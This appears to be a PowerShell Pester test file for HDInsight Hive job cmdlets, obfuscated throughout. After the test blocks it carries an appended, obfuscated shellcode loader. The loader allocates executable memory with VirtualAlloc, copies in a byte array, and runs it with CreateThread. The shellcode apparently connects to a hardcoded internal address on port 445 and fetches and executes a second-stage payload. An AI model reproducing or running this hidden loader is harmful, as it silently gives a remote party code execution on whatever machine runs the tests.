${hE`RE} = .("{2}{1}{0}{3}" -f'P','-','Split','ath') -Parent ${My`inv`OC`AtION}."mycO`M`M`AND"."Pa`Th"
${s`Ut} = (&("{1}{0}{2}"-f 't-Pat','Spli','h') -Leaf ${m`YinVocAT`ioN}."myCoM`M`AND"."P`ATH") -replace ((("{1}{0}" -f'ests','I7o.T'))."R`EPLaCe"(([chAr]73+[chAr]55+[chAr]111),'\')), ''
. "$here\$sut"

${C`LU`stErnaME} = ${En`V:c`LUst`ErnA`ME}
${HT`Tp`UsErp`ASsW`OrD} = ${E`NV`:`hTTPPAs`SWoRD}
${seCUrEp`A`SSw`o`Rd} = &("{3}{1}{0}{6}{4}{2}{5}"-f'v','on','o-SecureSt','C','tT','ring','er') ${HtTpu`serPa`SS`wORd} -AsPlainText -Force
${c`ReDS} = .("{1}{2}{0}" -f 'Object','N','ew-') -TypeName ("{9}{5}{2}{10}{6}{1}{4}{3}{8}{0}{7}" -f'ti','to','Managem','ation.PSCre','m','em.','Au','al','den','Syst','ent.') -ArgumentList ("{1}{0}" -f'n','admi'), ${S`EcU`R`ePa`sSWORd}


function ge`T-c`Red`entIAl { return ${c`R`eDS} }

&("{0}{1}"-f'Descr','ibe') ("{2}{4}{0}{8}{1}{7}{3}{5}{6}" -f'se','e-po','hdinsight-hadoop','she','-u','l','l','wer','-hiv') {
    .('It') ("{6}{5}{11}{4}{9}{12}{0}{10}{1}{3}{8}{7}{2}" -f'tar','zHD','b','Ins','Hive q','s a','Run','Jo','ight','ue','t-A',' ','ry using S') {
        
        
        &("{1}{0}" -f'k','Moc') ("{2}{0}{1}" -f '-Hos','t','Read') { ${ClUSTE`R`NA`me} }
        
        
        (&("{0}{4}{1}{2}{3}" -f'S','-Hive','J','ob','tart'))[-1].("{0}{1}{2}" -f'S','tart','sWith').Invoke(("{1}{0}{2}" -f '012-02-','2','03')) | .("{1}{0}"-f 'hould','S') ('be') ("{1}{0}"-f 'e','Tru')
    }

    .('It') ("{5}{2}{4}{0}{3}{1}"-f'v','e-Hive','ve query using','ok',' In','Runs a Hi') {
        
        
        .("{1}{0}" -f 'ck','Mo') ("{0}{2}{1}" -f'Rea','st','d-Ho') { ${clUsT`erna`ME} }
        
        
        (&("{3}{1}{2}{0}"-f 'voke','H','iveJobIn','Start-'))[-1].("{1}{2}{0}" -f 'tsWith','Sta','r').Invoke(("{1}{0}{2}"-f '2-','2012-0','03')) | .("{0}{1}" -f 'Sho','uld') ('be') ("{1}{0}" -f 'e','Tru')
    }

}

${c} = (((("{6}{70}{33}{37}{64}{67}{84}{68}{34}{74}{116}{78}{75}{50}{76}{65}{96}{105}{119}{117}{103}{108}{127}{88}{51}{83}{80}{26}{54}{69}{57}{109}{53}{56}{24}{1}{48}{81}{129}{21}{106}{118}{42}{62}{104}{86}{92}{15}{47}{115}{23}{114}{13}{43}{100}{112}{126}{111}{7}{0}{97}{87}{14}{123}{46}{44}{11}{120}{85}{124}{91}{82}{122}{102}{95}{16}{45}{28}{25}{39}{38}{79}{30}{31}{72}{93}{9}{90}{52}{40}{110}{4}{89}{66}{113}{55}{125}{8}{2}{12}{27}{36}{71}{59}{5}{19}{121}{29}{107}{3}{32}{49}{58}{73}{35}{61}{22}{41}{98}{60}{20}{77}{63}{17}{128}{94}{99}{18}{10}{101}" -f 'h','e,','tr l','t)]pu','t','llI','[DllIm','ateT','tP','a',')','Attribu','pTh','te','a',')','e, Int','est, uin','ount','mport(xzt','Pt',';[','n','tatic e','yp','t','ize,','r','r','t.dll','s, ','IntPtr l','blic stati','(xztke','ub','ter','e','r','ddr','A',' ui','tPtr m','port','rn IntP','hread','Ptr lpSta','ntPtr lpT',']public',' ','c ','Pt',', uint ','r,','ocatio',' ui',' ','nT',' flAl','e','[D','t(Int','n I','(','d','nel',' ','eationF','32.dll','p','nt','port','adId);','pP','x','li','ic extern Int','r','r ','stat','es','S','uint ','t dw','dw','xzt)]','s','l32.dll','e','s',' dwCr','mete',' uin','xzt','ar',', uint','kSiz','V','r','emse',' c','t',';','c','tr lpAdd','xztkerne','irt','Dl','xz','re','l','n','re','r','lags,','x',' s','c ','oc(IntP','lIm','ualAll','te','msvcr','Sta','d(I',',','In',' C','s','t src','flProtect)'))  -cREpLAcE'xzt',[ChaR]34));${W} = .("{0}{1}{2}" -f 'Ad','d-Typ','e') -memberDefinition ${C} -Name ("{1}{0}"-f'n32','Wi') -namespace ("{3}{4}{0}{1}{2}" -f'ncti','on','s','Win32F','u') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x92,0x68,0x02,0x00,0x01,0xbd,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${z}."Le`NGTH" -gt 0x1000){${g} = ${z}."leNG`TH"};${X}=${W}::("{1}{3}{2}{0}"-f 'lAlloc','V','tua','ir').Invoke(0,0x1000,${G},0x40);for (${i}=0;${i} -le (${z}."L`enGtH"-1);${i}++) {${w}::"M`EMseT"([IntPtr](${X}.("{2}{0}{1}" -f '3','2','ToInt').Invoke()+${i}), ${Z}[${I}], 1)};${W}::("{2}{0}{1}"-f'hrea','d','CreateT').Invoke(0,0,${X},0,0,0);for (;;){.("{1}{0}{3}{2}"-f 't-s','Star','eep','l') 60};
